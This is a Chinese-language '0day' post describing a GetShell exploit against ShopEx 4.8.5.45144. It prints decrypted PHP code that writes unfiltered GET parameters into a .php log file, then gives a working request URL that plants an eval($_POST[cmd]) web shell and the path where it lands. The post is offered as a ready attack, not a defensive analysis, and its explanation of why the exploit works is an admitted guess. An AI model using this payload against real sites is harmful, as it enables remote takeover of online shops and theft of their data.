【Oday】shopex 4.8.5.45144 GetShell

by:俺是农村的
QQ：332876777

\core\include_v5\crontab.php zend加密后的，我只发布解密后的代码。
public function run( )
                {
                                $this->logFile = HOME_DIR."/logs/access.log.php";
                                $this->now = time( );
                                $this->viewStat( );
                                $messenger =& $this->loadModel( "system/messenger" );
                                $messenger->runQueue( );
                }

                public function viewStat( )
                {
                                if ( !file_exists( $this->logFile ) )
                                {
                                                file_put_contents( $this->logFile, "#<?php exit()?>\n" );   //囧之处！By：小翔
                                }
                                if ( isset( $_GET['action'] ) )
                                {
                                                error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤，By：小翔shopex 4.8.5.45144 getshell 0day  By：小翔
                                                 于：2010.06.09 00:40

俺是农村的，不才，不知道原理，只测试了几个站，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。
直接提交：http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在：http://127.0.0.1/shopex/home/logs/access.log.php
哪位牛牛研究出来，为什么linux下面php exit() 不退出，麻烦你告诉我。